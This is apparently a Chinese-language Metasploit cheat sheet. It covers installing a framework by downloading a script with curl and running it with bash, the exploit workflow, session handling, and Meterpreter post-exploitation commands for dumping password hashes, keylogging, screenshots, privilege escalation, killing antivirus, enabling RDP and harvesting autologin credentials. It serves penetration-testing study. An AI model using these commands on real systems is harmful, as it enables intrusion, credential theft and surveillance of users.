Metasploit漏洞利用框架

@wintry大约 2 分钟

VPS安装

https://www.yuque.com/vipersec/helpopen in new window

sysctl -w vm.max_map_count=262144
curl -o f8x https://f8x.io/   # wget -O f8x https://f8x.io/
bash f8x -viper

Metasploit模块划分

MSF是渗透测试领域最流行的渗透测试框架,它有以下5个模块

辅 助 模 块 (Auxiliary,扫描器)扫描主机系统,寻找可用漏洞;
渗透攻击模块 (Exploits)进行漏洞利用攻击;
攻击载荷模块 (Payloads)生成攻击载荷(木马);
后渗透攻击模块 (Post)用于内网渗透的各种操作;
编 码 器 模 块 (Encoders)选择编码技术,绕过杀软(或其他免杀方式)

所有模块位置:/usr/share/metasploit-framework/modules/

渗透步骤(Exploit)

命令作用
search xxx#搜索某个漏洞
use xxx#使用某个漏洞利用模块
show options#查看配置选项
set payload#配置攻击载荷
exploit#执行渗透攻击

参数摘要

命令作用
reload_all#从目录重载所有模块
back#后退命令,移出当前上下文,用于模块切换
info#目标和模块详细信息
check#检查目标是否受某个漏洞影响

sessions会话管理

命令作用
sessions -l#列出所有会话
sessions -K#终止所有会话
sessions -i id#进入某个会话
sessions -v#以详细模式列出会话
sessions -u#在许多平台上将shell升级到meterpreter会话

show options显示可选选项

命令作用
auxiliary#显示所有辅助模块
exploits#显示所有漏洞利用模块
payloads#显示所有有效载荷
targets#显示所有可用目标
advanced#显示更多高级选项
encoders#显示可用编码器列表

Meterpreter用例

刚获得Meterpreter Shell时,该Shell是极其脆弱的,可以把它和目标机中一个稳定的程序绑定

命令作用
getpid#查看当前Meterpreter Shell的进程号
ps#获取目标机正运行的进程
migrate 476#将shell迁移到PID为786的进程中

命令摘要

pwd、ls、cd

命令作用
getuid#查看当前权限
getsystem#获得系统管理员权限(要本地管理员权限运行)
hashdump#抓哈希密码
sysinfo#查看系统信息
idletim#查看目标系统已运行时间
route#查看目标机完整网络设置
shell#进入目标机shell,exit退出shell
background#将meterpreter隐藏在后台
upload ./1.txt c:\1.txt#上传文件
download c:\1.txt ./下载文件
search -f *.txt -d c://#搜索文件
keyscan_start#启动键盘记录
keyscan_stop#停止键盘记录
keyscan_dump#转储键盘记录的内容
screenshot#抓取截屏

后渗透模块

run post/windows/gather/checkvm           #检查目标是否虚拟机
run post/linux/gather/checkvm
run post/windows/manage/killav            #关闭杀软
run post/windows/manage/enable_rdp          #开启目标远程桌面
run post/windows/gather/enum_logged_on_users     #列举当前登陆用户,和最近登陆过的用户
run post/windows/gather/enum_applications      #列举应用程序
run windows/gather/credentials/windows_autologin   #列举自动登陆的用户名和密码